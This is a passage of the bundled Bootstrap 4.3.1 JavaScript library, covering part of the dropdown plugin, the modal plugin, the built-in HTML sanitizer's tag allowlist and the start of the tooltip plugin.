  $(document).on(Event$4.KEYDOWN_DATA_API, Selector$4.DATA_TOGGLE, Dropdown._dataApiKeydownHandler).on(Event$4.KEYDOWN_DATA_API, Selector$4.MENU, Dropdown._dataApiKeydownHandler).on(Event$4.CLICK_DATA_API + " " + Event$4.KEYUP_DATA_API, Dropdown._clearMenus).on(Event$4.CLICK_DATA_API, Selector$4.DATA_TOGGLE, function (event) {
    event.preventDefault();
    event.stopPropagation();

    Dropdown._jQueryInterface.call($(this), 'toggle');
  }).on(Event$4.CLICK_DATA_API, Selector$4.FORM_CHILD, function (e) {
    e.stopPropagation();
  });
  /**
   * ------------------------------------------------------------------------
   * jQuery
   * ------------------------------------------------------------------------
   */

  $.fn[NAME$4] = Dropdown._jQueryInterface;
  $.fn[NAME$4].Constructor = Dropdown;

  $.fn[NAME$4].noConflict = function () {
    $.fn[NAME$4] = JQUERY_NO_CONFLICT$4;
    return Dropdown._jQueryInterface;
  };

  /**
   * ------------------------------------------------------------------------
   * Constants
   * ------------------------------------------------------------------------
   */

  var NAME$5 = 'modal';
  var VERSION$5 = '4.3.1';
  var DATA_KEY$5 = 'bs.modal';
  var EVENT_KEY$5 = "." + DATA_KEY$5;
  var DATA_API_KEY$5 = '.data-api';
  var JQUERY_NO_CONFLICT$5 = $.fn[NAME$5];
  var ESCAPE_KEYCODE$1 = 27; // KeyboardEvent.which value for Escape (Esc) key

  var Default$3 = {
    backdrop: true,
    keyboard: true,
    focus: true,
    show: true
  };
  var DefaultType$3 = {
    backdrop: '(boolean|string)',
    keyboard: 'boolean',
    focus: 'boolean',
    show: 'boolean'
  };
  var Event$5 = {
    HIDE: "hide" + EVENT_KEY$5,
    HIDDEN: "hidden" + EVENT_KEY$5,
    SHOW: "show" + EVENT_KEY$5,
    SHOWN: "shown" + EVENT_KEY$5,
    FOCUSIN: "focusin" + EVENT_KEY$5,
    RESIZE: "resize" + EVENT_KEY$5,
    CLICK_DISMISS: "click.dismiss" + EVENT_KEY$5,
    KEYDOWN_DISMISS: "keydown.dismiss" + EVENT_KEY$5,
    MOUSEUP_DISMISS: "mouseup.dismiss" + EVENT_KEY$5,
    MOUSEDOWN_DISMISS: "mousedown.dismiss" + EVENT_KEY$5,
    CLICK_DATA_API: "click" + EVENT_KEY$5 + DATA_API_KEY$5
  };
  var ClassName$5 = {
    SCROLLABLE: 'modal-dialog-scrollable',
    SCROLLBAR_MEASURER: 'modal-scrollbar-measure',
    BACKDROP: 'modal-backdrop',
    OPEN: 'modal-open',
    FADE: 'fade',
    SHOW: 'show'
  };
  var Selector$5 = {
    DIALOG: '.modal-dialog',
    MODAL_BODY: '.modal-body',
    DATA_TOGGLE: '[data-toggle="modal"]',
    DATA_DISMISS: '[data-dismiss="modal"]',
    FIXED_CONTENT: '.fixed-top, .fixed-bottom, .is-fixed, .sticky-top',
    STICKY_CONTENT: '.sticky-top'
    /**
     * ------------------------------------------------------------------------
     * Class Definition
     * ------------------------------------------------------------------------
     */

  };

  var Modal =
  /*#__PURE__*/
  function () {
    function Modal(element, config) {
      this._config = this._getConfig(config);
      this._element = element;
      this._dialog = element.querySelector(Selector$5.DIALOG);
      this._backdrop = null;
      this._isShown = false;
      this._isBodyOverflowing = false;
      this._ignoreBackdropClick = false;
      this._isTransitioning = false;
      this._scrollbarWidth = 0;
    } // Getters


    var _proto = Modal.prototype;

    // Public
    _proto.toggle = function toggle(relatedTarget) {
      return this._isShown ? this.hide() : this.show(relatedTarget);
    };

    _proto.show = function show(relatedTarget) {
      var _this = this;

      if (this._isShown || this._isTransitioning) {
        return;
      }

      if ($(this._element).hasClass(ClassName$5.FADE)) {
        this._isTransitioning = true;
      }

      var showEvent = $.Event(Event$5.SHOW, {
        relatedTarget: relatedTarget
      });
      $(this._element).trigger(showEvent);

      if (this._isShown || showEvent.isDefaultPrevented()) {
        return;
      }

      this._isShown = true;

      this._checkScrollbar();

      this._setScrollbar();

      this._adjustDialog();

      this._setEscapeEvent();

      this._setResizeEvent();

      $(this._element).on(Event$5.CLICK_DISMISS, Selector$5.DATA_DISMISS, function (event) {
        return _this.hide(event);
      });
      $(this._dialog).on(Event$5.MOUSEDOWN_DISMISS, function () {
        $(_this._element).one(Event$5.MOUSEUP_DISMISS, function (event) {
          if ($(event.target).is(_this._element)) {
            _this._ignoreBackdropClick = true;
          }
        });
      });

      this._showBackdrop(function () {
        return _this._showElement(relatedTarget);
      });
    };

    _proto.hide = function hide(event) {
      var _this2 = this;

      if (event) {
        event.preventDefault();
      }

      if (!this._isShown || this._isTransitioning) {
        return;
      }

      var hideEvent = $.Event(Event$5.HIDE);
      $(this._element).trigger(hideEvent);

      if (!this._isShown || hideEvent.isDefaultPrevented()) {
        return;
      }

      this._isShown = false;
      var transition = $(this._element).hasClass(ClassName$5.FADE);

      if (transition) {
        this._isTransitioning = true;
      }

      this._setEscapeEvent();

      this._setResizeEvent();

      $(document).off(Event$5.FOCUSIN);
      $(this._element).removeClass(ClassName$5.SHOW);
      $(this._element).off(Event$5.CLICK_DISMISS);
      $(this._dialog).off(Event$5.MOUSEDOWN_DISMISS);

      if (transition) {
        var transitionDuration = Util.getTransitionDurationFromElement(this._element);
        $(this._element).one(Util.TRANSITION_END, function (event) {
          return _this2._hideModal(event);
        }).emulateTransitionEnd(transitionDuration);
      } else {
        this._hideModal();
      }
    };

    _proto.dispose = function dispose() {
      [window, this._element, this._dialog].forEach(function (htmlElement) {
        return $(htmlElement).off(EVENT_KEY$5);
      });
      /**
       * `document` has 2 events `Event.FOCUSIN` and `Event.CLICK_DATA_API`
       * Do not move `document` in `htmlElements` array
       * It will remove `Event.CLICK_DATA_API` event that should remain
       */

      $(document).off(Event$5.FOCUSIN);
      $.removeData(this._element, DATA_KEY$5);
      this._config = null;
      this._element = null;
      this._dialog = null;
      this._backdrop = null;
      this._isShown = null;
      this._isBodyOverflowing = null;
      this._ignoreBackdropClick = null;
      this._isTransitioning = null;
      this._scrollbarWidth = null;
    };

    _proto.handleUpdate = function handleUpdate() {
      this._adjustDialog();
    } // Private
    ;

    _proto._getConfig = function _getConfig(config) {
      config = _objectSpread({}, Default$3, config);
      Util.typeCheckConfig(NAME$5, config, DefaultType$3);
      return config;
    };

    _proto._showElement = function _showElement(relatedTarget) {
      var _this3 = this;

      var transition = $(this._element).hasClass(ClassName$5.FADE);

      if (!this._element.parentNode || this._element.parentNode.nodeType !== Node.ELEMENT_NODE) {
        // Don't move modal's DOM position
        document.body.appendChild(this._element);
      }

      this._element.style.display = 'block';

      this._element.removeAttribute('aria-hidden');

      this._element.setAttribute('aria-modal', true);

      if ($(this._dialog).hasClass(ClassName$5.SCROLLABLE)) {
        this._dialog.querySelector(Selector$5.MODAL_BODY).scrollTop = 0;
      } else {
        this._element.scrollTop = 0;
      }

      if (transition) {
        Util.reflow(this._element);
      }

      $(this._element).addClass(ClassName$5.SHOW);

      if (this._config.focus) {
        this._enforceFocus();
      }

      var shownEvent = $.Event(Event$5.SHOWN, {
        relatedTarget: relatedTarget
      });

      var transitionComplete = function transitionComplete() {
        if (_this3._config.focus) {
          _this3._element.focus();
        }

        _this3._isTransitioning = false;
        $(_this3._element).trigger(shownEvent);
      };

      if (transition) {
        var transitionDuration = Util.getTransitionDurationFromElement(this._dialog);
        $(this._dialog).one(Util.TRANSITION_END, transitionComplete).emulateTransitionEnd(transitionDuration);
      } else {
        transitionComplete();
      }
    };

    _proto._enforceFocus = function _enforceFocus() {
      var _this4 = this;

      $(document).off(Event$5.FOCUSIN) // Guard against infinite focus loop
      .on(Event$5.FOCUSIN, function (event) {
        if (document !== event.target && _this4._element !== event.target && $(_this4._element).has(event.target).length === 0) {
          _this4._element.focus();
        }
      });
    };

    _proto._setEscapeEvent = function _setEscapeEvent() {
      var _this5 = this;

      if (this._isShown && this._config.keyboard) {
        $(this._element).on(Event$5.KEYDOWN_DISMISS, function (event) {
          if (event.which === ESCAPE_KEYCODE$1) {
            event.preventDefault();

            _this5.hide();
          }
        });
      } else if (!this._isShown) {
        $(this._element).off(Event$5.KEYDOWN_DISMISS);
      }
    };

    _proto._setResizeEvent = function _setResizeEvent() {
      var _this6 = this;

      if (this._isShown) {
        $(window).on(Event$5.RESIZE, function (event) {
          return _this6.handleUpdate(event);
        });
      } else {
        $(window).off(Event$5.RESIZE);
      }
    };

    _proto._hideModal = function _hideModal() {
      var _this7 = this;

      this._element.style.display = 'none';

      this._element.setAttribute('aria-hidden', true);

      this._element.removeAttribute('aria-modal');

      this._isTransitioning = false;

      this._showBackdrop(function () {
        $(document.body).removeClass(ClassName$5.OPEN);

        _this7._resetAdjustments();

        _this7._resetScrollbar();

        $(_this7._element).trigger(Event$5.HIDDEN);
      });
    };

    _proto._removeBackdrop = function _removeBackdrop() {
      if (this._backdrop) {
        $(this._backdrop).remove();
        this._backdrop = null;
      }
    };

    _proto._showBackdrop = function _showBackdrop(callback) {
      var _this8 = this;

      var animate = $(this._element).hasClass(ClassName$5.FADE) ? ClassName$5.FADE : '';

      if (this._isShown && this._config.backdrop) {
        this._backdrop = document.createElement('div');
        this._backdrop.className = ClassName$5.BACKDROP;

        if (animate) {
          this._backdrop.classList.add(animate);
        }

        $(this._backdrop).appendTo(document.body);
        $(this._element).on(Event$5.CLICK_DISMISS, function (event) {
          if (_this8._ignoreBackdropClick) {
            _this8._ignoreBackdropClick = false;
            return;
          }

          if (event.target !== event.currentTarget) {
            return;
          }

          if (_this8._config.backdrop === 'static') {
            _this8._element.focus();
          } else {
            _this8.hide();
          }
        });

        if (animate) {
          Util.reflow(this._backdrop);
        }

        $(this._backdrop).addClass(ClassName$5.SHOW);

        if (!callback) {
          return;
        }

        if (!animate) {
          callback();
          return;
        }

        var backdropTransitionDuration = Util.getTransitionDurationFromElement(this._backdrop);
        $(this._backdrop).one(Util.TRANSITION_END, callback).emulateTransitionEnd(backdropTransitionDuration);
      } else if (!this._isShown && this._backdrop) {
        $(this._backdrop).removeClass(ClassName$5.SHOW);

        var callbackRemove = function callbackRemove() {
          _this8._removeBackdrop();

          if (callback) {
            callback();
          }
        };

        if ($(this._element).hasClass(ClassName$5.FADE)) {
          var _backdropTransitionDuration = Util.getTransitionDurationFromElement(this._backdrop);

          $(this._backdrop).one(Util.TRANSITION_END, callbackRemove).emulateTransitionEnd(_backdropTransitionDuration);
        } else {
          callbackRemove();
        }
      } else if (callback) {
        callback();
      }
    } // ----------------------------------------------------------------------
    // the following methods are used to handle overflowing modals
    // todo (fat): these should probably be refactored out of modal.js
    // ----------------------------------------------------------------------
    ;

    _proto._adjustDialog = function _adjustDialog() {
      var isModalOverflowing = this._element.scrollHeight > document.documentElement.clientHeight;

      if (!this._isBodyOverflowing && isModalOverflowing) {
        this._element.style.paddingLeft = this._scrollbarWidth + "px";
      }

      if (this._isBodyOverflowing && !isModalOverflowing) {
        this._element.style.paddingRight = this._scrollbarWidth + "px";
      }
    };

    _proto._resetAdjustments = function _resetAdjustments() {
      this._element.style.paddingLeft = '';
      this._element.style.paddingRight = '';
    };

    _proto._checkScrollbar = function _checkScrollbar() {
      var rect = document.body.getBoundingClientRect();
      this._isBodyOverflowing = rect.left + rect.right < window.innerWidth;
      this._scrollbarWidth = this._getScrollbarWidth();
    };

    _proto._setScrollbar = function _setScrollbar() {
      var _this9 = this;

      if (this._isBodyOverflowing) {
        // Note: DOMNode.style.paddingRight returns the actual value or '' if not set
        //   while $(DOMNode).css('padding-right') returns the calculated value or 0 if not set
        var fixedContent = [].slice.call(document.querySelectorAll(Selector$5.FIXED_CONTENT));
        var stickyContent = [].slice.call(document.querySelectorAll(Selector$5.STICKY_CONTENT)); // Adjust fixed content padding

        $(fixedContent).each(function (index, element) {
          var actualPadding = element.style.paddingRight;
          var calculatedPadding = $(element).css('padding-right');
          $(element).data('padding-right', actualPadding).css('padding-right', parseFloat(calculatedPadding) + _this9._scrollbarWidth + "px");
        }); // Adjust sticky content margin

        $(stickyContent).each(function (index, element) {
          var actualMargin = element.style.marginRight;
          var calculatedMargin = $(element).css('margin-right');
          $(element).data('margin-right', actualMargin).css('margin-right', parseFloat(calculatedMargin) - _this9._scrollbarWidth + "px");
        }); // Adjust body padding

        var actualPadding = document.body.style.paddingRight;
        var calculatedPadding = $(document.body).css('padding-right');
        $(document.body).data('padding-right', actualPadding).css('padding-right', parseFloat(calculatedPadding) + this._scrollbarWidth + "px");
      }

      $(document.body).addClass(ClassName$5.OPEN);
    };

    _proto._resetScrollbar = function _resetScrollbar() {
      // Restore fixed content padding
      var fixedContent = [].slice.call(document.querySelectorAll(Selector$5.FIXED_CONTENT));
      $(fixedContent).each(function (index, element) {
        var padding = $(element).data('padding-right');
        $(element).removeData('padding-right');
        element.style.paddingRight = padding ? padding : '';
      }); // Restore sticky content

      var elements = [].slice.call(document.querySelectorAll("" + Selector$5.STICKY_CONTENT));
      $(elements).each(function (index, element) {
        var margin = $(element).data('margin-right');

        if (typeof margin !== 'undefined') {
          $(element).css('margin-right', margin).removeData('margin-right');
        }
      }); // Restore body padding

      var padding = $(document.body).data('padding-right');
      $(document.body).removeData('padding-right');
      document.body.style.paddingRight = padding ? padding : '';
    };

    _proto._getScrollbarWidth = function _getScrollbarWidth() {
      // thx d.walsh
      var scrollDiv = document.createElement('div');
      scrollDiv.className = ClassName$5.SCROLLBAR_MEASURER;
      document.body.appendChild(scrollDiv);
      var scrollbarWidth = scrollDiv.getBoundingClientRect().width - scrollDiv.clientWidth;
      document.body.removeChild(scrollDiv);
      return scrollbarWidth;
    } // Static
    ;

    Modal._jQueryInterface = function _jQueryInterface(config, relatedTarget) {
      return this.each(function () {
        var data = $(this).data(DATA_KEY$5);

        var _config = _objectSpread({}, Default$3, $(this).data(), typeof config === 'object' && config ? config : {});

        if (!data) {
          data = new Modal(this, _config);
          $(this).data(DATA_KEY$5, data);
        }

        if (typeof config === 'string') {
          if (typeof data[config] === 'undefined') {
            throw new TypeError("No method named \"" + config + "\"");
          }

          data[config](relatedTarget);
        } else if (_config.show) {
          data.show(relatedTarget);
        }
      });
    };

    _createClass(Modal, null, [{
      key: "VERSION",
      get: function get() {
        return VERSION$5;
      }
    }, {
      key: "Default",
      get: function get() {
        return Default$3;
      }
    }]);

    return Modal;
  }();
  /**
   * ------------------------------------------------------------------------
   * Data Api implementation
   * ------------------------------------------------------------------------
   */


  $(document).on(Event$5.CLICK_DATA_API, Selector$5.DATA_TOGGLE, function (event) {
    var _this10 = this;

    var target;
    var selector = Util.getSelectorFromElement(this);

    if (selector) {
      target = document.querySelector(selector);
    }

    var config = $(target).data(DATA_KEY$5) ? 'toggle' : _objectSpread({}, $(target).data(), $(this).data());

    if (this.tagName === 'A' || this.tagName === 'AREA') {
      event.preventDefault();
    }

    var $target = $(target).one(Event$5.SHOW, function (showEvent) {
      if (showEvent.isDefaultPrevented()) {
        // Only register focus restorer if modal will actually get shown
        return;
      }

      $target.one(Event$5.HIDDEN, function () {
        if ($(_this10).is(':visible')) {
          _this10.focus();
        }
      });
    });

    Modal._jQueryInterface.call($(target), config, this);
  });
  /**
   * ------------------------------------------------------------------------
   * jQuery
   * ------------------------------------------------------------------------
   */

  $.fn[NAME$5] = Modal._jQueryInterface;
  $.fn[NAME$5].Constructor = Modal;

  $.fn[NAME$5].noConflict = function () {
    $.fn[NAME$5] = JQUERY_NO_CONFLICT$5;
    return Modal._jQueryInterface;
  };

  /**
   * --------------------------------------------------------------------------
   * Bootstrap (v4.3.1): tools/sanitizer.js
   * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
   * --------------------------------------------------------------------------
   */
  var uriAttrs = ['background', 'cite', 'href', 'itemtype', 'longdesc', 'poster', 'src', 'xlink:href'];
  var ARIA_ATTRIBUTE_PATTERN = /^aria-[\w-]*$/i;
  var DefaultWhitelist = {
    // Global attributes allowed on any supplied element below.
    '*': ['class', 'dir', 'id', 'lang', 'role', ARIA_ATTRIBUTE_PATTERN],
    a: ['target', 'href', 'title', 'rel'],
    area: [],
    b: [],
    br: [],
    col: [],
    code: [],
    div: [],
    em: [],
    hr: [],
    h1: [],
    h2: [],
    h3: [],
    h4: [],
    h5: [],
    h6: [],
    i: [],
    img: ['src', 'alt', 'title', 'width', 'height'],
    li: [],
    ol: [],
    p: [],
    pre: [],
    s: [],
    small: [],
    span: [],
    sub: [],
    sup: [],
    strong: [],
    u: [],
    ul: []
    /**
     * A pattern that recognizes a commonly useful subset of URLs that are safe.
     *
     * Shoutout to Angular 7 https://github.com/angular/angular/blob/7.2.4/packages/core/src/sanitization/url_sanitizer.ts
     */

  };
  var SAFE_URL_PATTERN = /^(?:(?:https?|mailto|ftp|tel|file):|[^&:/?#]*(?:[/?#]|$))/gi;
  /**
   * A pattern that matches safe data URLs. Only matches image, video and audio types.
   *
   * Shoutout to Angular 7 https://github.com/angular/angular/blob/7.2.4/packages/core/src/sanitization/url_sanitizer.ts
   */

  var DATA_URL_PATTERN = /^data:(?:image\/(?:bmp|gif|jpeg|jpg|png|tiff|webp)|video\/(?:mpeg|mp4|ogg|webm)|audio\/(?:mp3|oga|ogg|opus));base64,[a-z0-9+/]+=*$/i;

  function allowedAttribute(attr, allowedAttributeList) {
    var attrName = attr.nodeName.toLowerCase();

    if (allowedAttributeList.indexOf(attrName) !== -1) {
      if (uriAttrs.indexOf(attrName) !== -1) {
        return Boolean(attr.nodeValue.match(SAFE_URL_PATTERN) || attr.nodeValue.match(DATA_URL_PATTERN));
      }

      return true;
    }

    var regExp = allowedAttributeList.filter(function (attrRegex) {
      return attrRegex instanceof RegExp;
    }); // Check if a regular expression validates the attribute.

    for (var i = 0, l = regExp.length; i < l; i++) {
      if (attrName.match(regExp[i])) {
        return true;
      }
    }

    return false;
  }

  function sanitizeHtml(unsafeHtml, whiteList, sanitizeFn) {
    if (unsafeHtml.length === 0) {
      return unsafeHtml;
    }

    if (sanitizeFn && typeof sanitizeFn === 'function') {
      return sanitizeFn(unsafeHtml);
    }

    var domParser = new window.DOMParser();
    var createdDocument = domParser.parseFromString(unsafeHtml, 'text/html');
    var whitelistKeys = Object.keys(whiteList);
    var elements = [].slice.call(createdDocument.body.querySelectorAll('*'));

    var _loop = function _loop(i, len) {
      var el = elements[i];
      var elName = el.nodeName.toLowerCase();

      if (whitelistKeys.indexOf(el.nodeName.toLowerCase()) === -1) {
        el.parentNode.removeChild(el);
        return "continue";
      }

      var attributeList = [].slice.call(el.attributes);
      var whitelistedAttributes = [].concat(whiteList['*'] || [], whiteList[elName] || []);
      attributeList.forEach(function (attr) {
        if (!allowedAttribute(attr, whitelistedAttributes)) {
          el.removeAttribute(attr.nodeName);
        }
      });
    };

    for (var i = 0, len = elements.length; i < len; i++) {
      var _ret = _loop(i, len);

      if (_ret === "continue") continue;
    }

    return createdDocument.body.innerHTML;
  }

  /**
   * ------------------------------------------------------------------------
   * Constants
   * ------------------------------------------------------------------------
   */

  var NAME$6 = 'tooltip';
  var VERSION$6 = '4.3.1';
  var DATA_KEY$6 = 'bs.tooltip';
  var EVENT_KEY$6 = "." + DATA_KEY$6;
  var JQUERY_NO_CONFLICT$6 = $.fn[NAME$6];
  var CLASS_PREFIX = 'bs-tooltip';
  var BSCLS_PREFIX_REGEX = new RegExp("(^|\\s)" + CLASS_PREFIX + "\\S+", 'g');
  var DISALLOWED_ATTRIBUTES = ['sanitize', 'whiteList', 'sanitizeFn'];
  var DefaultType$4 = {
    animation: 'boolean',
    template: 'string',
    title: '(string|element|function)',
    trigger: 'string',
    delay: '(number|object)',
    html: 'boolean',
    selector: '(string|boolean)',
    placement: '(string|function)',
    offset: '(number|string|function)',
    container: '(string|element|boolean)',
    fallbackPlacement: '(string|array)',
    boundary: '(string|element)',
    sanitize: 'boolean',
    sanitizeFn: '(null|function)',
    whiteList: 'object'
  };
  var AttachmentMap$1 = {
    AUTO: 'auto',
    TOP: 'top',
    RIGHT: 'right',
    BOTTOM: 'bottom',
    LEFT: 'left'
  };
  var Default$4 = {
    animation: true,
    template: '<div class="tooltip" role="tooltip">' + '<div class="arrow"></div>' + '<div class="tooltip-inner"></div></div>',
    trigger: 'hover focus',
    title: '',
    delay: 0,
    html: false,
    selector: false,
    placement: 'top',
    offset: 0,
    container: false,
    fallbackPlacement: 'flip',
    boundary: 'scrollParent',
    sanitize: true,
    sanitizeFn: null,
    whiteList: DefaultWhitelist
  };
  var HoverState = {
    SHOW: 'show',
    OUT: 'out'
  };
  var Event$6 = {
    HIDE: "hide" + EVENT_KEY$6,
    HIDDEN: "hidden" + EVENT_KEY$6,
    SHOW: "show" + EVENT_KEY$6,
    SHOWN: "shown" + EVENT_KEY$6,
    INSERTED: "inserted" + EVENT_KEY$6,
    CLICK: "click" + EVENT_KEY$6,
    FOCUSIN: "focusin" + EVENT_KEY$6,
    FOCUSOUT: "focusout" + EVENT_KEY$6,
    MOUSEENTER: "mouseenter" + EVENT_KEY$6,
    MOUSELEAVE: "mouseleave" + EVENT_KEY$6
  };
  var ClassName$6 = {
    FADE: 'fade',
    SHOW: 'show'
  };
  var Selector$6 = {
    TOOLTIP: '.tooltip',
    TOOLTIP_INNER: '.tooltip-inner',
    ARROW: '.arrow'
  };
  var Trigger = {
    HOVER: 'hover',
    FOCUS: 'focus',
    CLICK: 'click',
    MANUAL: 'manual'
    /**
     * ------------------------------------------------------------------------
     * Class Definition
     * ------------------------------------------------------------------------
     */

  };

  var Tooltip =
  /*#__PURE__*/
  function () {
    function Tooltip(element, config) {
      /**
       * Check for Popper dependency
       * Popper - https://popper.js.org
       */
      if (typeof Popper === 'undefined') {
        throw new TypeError('Bootstrap\'s tooltips require Popper.js (https://popper.js.org/)');
      } // private


      this._isEnabled = true;
      this._timeout = 0;
      this._hoverState = '';
      this._activeTrigger = {};
      this._popper = null; // Protected

      this.element = element;
      this.config = this._getConfig(config);
      this.tip = null;

      this._setListeners();
    } // Getters


    var _proto = Tooltip.prototype;

    // Public
    _proto.enable = function enable() {
      this._isEnabled = true;
    };

    _proto.disable = function disable() {
      this._isEnabled = false;
    };

    _proto.toggleEnabled = function toggleEnabled() {
      this._isEnabled = !this._isEnabled;
    };

    _proto.toggle = function toggle(event) {
      if (!this._isEnabled) {
        return;
      }

      if (event) {
        var dataKey = this.constructor.DATA_KEY;
        var context = $(event.currentTarget).data(dataKey);

        if (!context) {
          context = new this.constructor(event.currentTarget, this._getDelegateConfig());
          $(event.currentTarget).data(dataKey, context);
        }

        context._activeTrigger.click = !context._activeTrigger.click;

        if (context._isWithActiveTrigger()) {
          context._enter(null, context);
        } else {
          context._leave(null, context);
        }
      } else {
        if ($(this.getTipElement()).hasClass(ClassName$6.SHOW)) {
          this._leave(null, this);

          return;
        }

        this._enter(null, this);
      }
    };

    _proto.dispose = function dispose() {
      clearTimeout(this._timeout);
      $.removeData(this.element, this.constructor.DATA_KEY);
      $(this.element).off(this.constructor.EVENT_KEY);
      $(this.element).closest('.modal').off('hide.bs.modal');

      if (this.tip) {
        $(this.tip).remove();
      }

      this._isEnabled = null;
      this._timeout = null;
      this._hoverState = null;
      this._activeTrigger = null;

      if (this._popper !== null) {
        this._popper.destroy();
      }

      this._popper = null;
      this.element = null;
      this.config = null;
      this.tip = null;
    };

    _proto.show = function show() {
      var _this = this;

      if ($(this.element).css('display') === 'none') {
        throw new Error('Please use show on visible elements');
      }

      var showEvent = $.Event(this.constructor.Event.SHOW);

      if (this.isWithContent() && this._isEnabled) {
        $(this.element).trigger(showEvent);
        var shadowRoot = Util.findShadowRoot(this.element);
        var isInTheDom = $.contains(shadowRoot !== null ? shadowRoot : this.element.ownerDocument.documentElement, this.element);

        if (showEvent.isDefaultPrevented() || !isInTheDom) {
          return;
        }

        var tip = this.getTipElement();
        var tipId = Util.getUID(this.constructor.NAME);
        tip.setAttribute('id', tipId);
        this.element.setAttribute('aria-describedby', tipId);
        this.setContent();

        if (this.config.animation) {
          $(tip).addClass(ClassName$6.FADE);
        }

        var placement = typeof this.config.placement === 'function' ? this.config.placement.call(this, tip, this.element) : this.config.placement;

        var attachment = this._getAttachment(placement);

        this.addAttachmentClass(attachment);

        var container = this._getContainer();

        $(tip).data(this.constructor.DATA_KEY, this);

        if (!$.contains(this.element.ownerDocument.documentElement, this.tip)) {
          $(tip).appendTo(container);
        }

        $(this.element).trigger(this.constructor.Event.INSERTED);
        this._popper = new Popper(this.element, tip, {
          placement: attachment,
          modifiers: {
            offset: this._getOffset(),
            flip: {
              behavior: this.config.fallbackPlacement
            },
            arrow: {
              element: Selector$6.ARROW
            },
            preventOverflow: {
              boundariesElement: this.config.boundary
            }
          },
          onCreate: function onCreate(data) {
            if (data.originalPlacement !== data.placement) {
              _this._handlePopperPlacementChange(data);
            }
          },
          onUpdate: function onUpdate(data) {
            return _this._handlePopperPlacementChange(data);
          }
        });
        $(tip).addClass(ClassName$6.SHOW); // If this is a touch-enabled device we add extra
        // empty mouseover listeners to the body's immediate children;
        // only needed because of broken event delegation on iOS
        // https://www.quirksmode.org/blog/archives/2014/02/mouse_event_bub.html

        if ('ontouchstart' in document.documentElement) {
          $(document.body).children().on('mouseover', null, $.noop);
        }

        var complete = function complete() {
          if (_this.config.animation) {
            _this._fixTransition();
          }

          var prevHoverState = _this._hoverState;
          _this._hoverState = null;
          $(_this.element).trigger(_this.constructor.Event.SHOWN);

          if (prevHoverState === HoverState.OUT) {
            _this._leave(null, _this);
          }
        };

        if ($(this.tip).hasClass(ClassName$6.FADE)) {
          var transitionDuration = Util.getTransitionDurationFromElement(this.tip);
          $(this.tip).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);
        } else {
          complete();
        }
      }
    };

    _proto.hide = function hide(callback) {
      var _this2 = this;

      var tip = this.getTipElement();
      var hideEvent = $.Event(this.constructor.Event.HIDE);

      var complete = function complete() {
        if (_this2._hoverState !== HoverState.SHOW && tip.parentNode) {
          tip.parentNode.removeChild(tip);
        }

        _this2._cleanTipClass();

        _this2.element.removeAttribute('aria-describedby');

        $(_this2.element).trigger(_this2.constructor.Event.HIDDEN);

        if (_this2._popper !== null) {
          _this2._popper.destroy();
        }

        if (callback) {
          callback();
        }
      };

      $(this.element).trigger(hideEvent);

      if (hideEvent.isDefaultPrevented()) {
        return;
      }

      $(tip).removeClass(ClassName$6.SHOW); // If this is a touch-enabled device we remove the extra
      // empty mouseover listeners we added for iOS support

      if ('ontouchstart' in document.documentElement) {
        $(document.body).children().off('mouseover', null, $.noop);
      }

      this._activeTrigger[Trigger.CLICK] = false;
      this._activeTrigger[Trigger.FOCUS] = false;
      this._activeTrigger[Trigger.HOVER] = false;

      if ($(this.tip).hasClass(ClassName$6.FADE)) {
        var transitionDuration = Util.getTransitionDurationFromElement(tip);
        $(tip).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);
      } else {
        complete();
      }

      this._hoverState = '';
    };

    _proto.update = function update() {
      if (this._popper !== null) {
        this._popper.scheduleUpdate();
      }
    } // Protected
    ;

    _proto.isWithContent = function isWithContent() {
      return Boolean(this.getTitle());
    };

    _proto.addAttachmentClass = function addAttachmentClass(attachment) {
      $(this.getTipElement()).addClass(CLASS_PREFIX + "-" + attachment);
    };

    _proto.getTipElement = function getTipElement() {
      this.tip = this.tip || $(this.config.template)[0];
      return this.tip;
    };

    _proto.setContent = function setContent() {
      var tip = this.getTipElement();
      this.setElementContent($(tip.querySelectorAll(Selector$6.TOOLTIP_INNER)), this.getTitle());
      $(tip).removeClass(ClassName$6.FADE + " " + ClassName$6.SHOW);
    };

    _proto.setElementContent = function setElementContent($element, content) {
      if (typeof content === 'object' && (content.nodeType || content.jquery)) {
        // Content is a DOM node or a jQuery
        if (this.config.html) {
          if (!$(content).parent().is($element)) {
            $element.empty().append(content);
          }
        } else {
          $element.text($(content).text());
        }

        return;
      }

      if (this.config.html) {
        if (this.config.sanitize) {
          content = sanitizeHtml(content, this.config.whiteList, this.config.sanitizeFn);
        }

        $element.html(content);
      } else {
        $element.text(content);
      }
    };

    _proto.getTitle = function getTitle() {
      var title = this.element.getAttribute('data-original-title');

      if (!title) {
        title = typeof this.config.title === 'function' ? this.config.title.call(this.element) : this.config.title;
      }

      return title;
    } // Private
    ;

    _proto._getOffset = function _getOffset() {
      var _this3 = this;

      var offset = {};

      if (typeof this.config.offset === 'function') {
        offset.fn = function (data) {
          data.offsets = _objectSpread({}, data.offsets, _this3.config.offset(data.offsets, _this3.element) || {});
          return data;
        };
      } else {
        offset.offset = this.config.offset;
      }

      return offset;
    };

    _proto._getContainer = function _getContainer() {
      if (this.config.container === false) {
        return document.body;
      }

      if (Util.isElement(this.config.container)) {
        return $(this.config.container);
      }

      return $(document).find(this.config.container);
    };

    _proto._getAttachment = function _getAttachment(placement) {
      return AttachmentMap$1[placement.toUpperCase()];
    };

    _proto._setListeners = function _setListeners() {
      var _this4 = this;

      var triggers = this.config.trigger.split(' ');
      triggers.forEach(function (trigger) {
        if (trigger === 'click') {
          $(_this4.element).on(_this4.constructor.Event.CLICK, _this4.config.selector, function (event) {
            return _this4.toggle(event);
          });
        } else if (trigger !== Trigger.MANUAL) {
          var eventIn = trigger === Trigger.HOVER ? _this4.constructor.Event.MOUSEENTER : _this4.constructor.Event.FOCUSIN;
          var eventOut = trigger === Trigger.HOVER ? _this4.constructor.Event.MOUSELEAVE : _this4.constructor.Event.FOCUSOUT;
          $(_this4.element).on(eventIn, _this4.config.selector, function (event) {
            return _this4._enter(event);
          }).on(eventOut, _this4.config.selector, function (event) {
            return _this4._leave(event);
          });
        }
      });
      $(this.element).closest('.modal').on('hide.bs.modal', function () {
        if (_this4.element) {
          _this4.hide();
        }
      });

      if (this.config.selector) {
        this.config = _objectSpread({}, this.config, {
          trigger: 'manual',
          selector: ''
        });
      } else {
        this._fixTitle();
      }
    };

    _proto._fixTitle = function _fixTitle() {
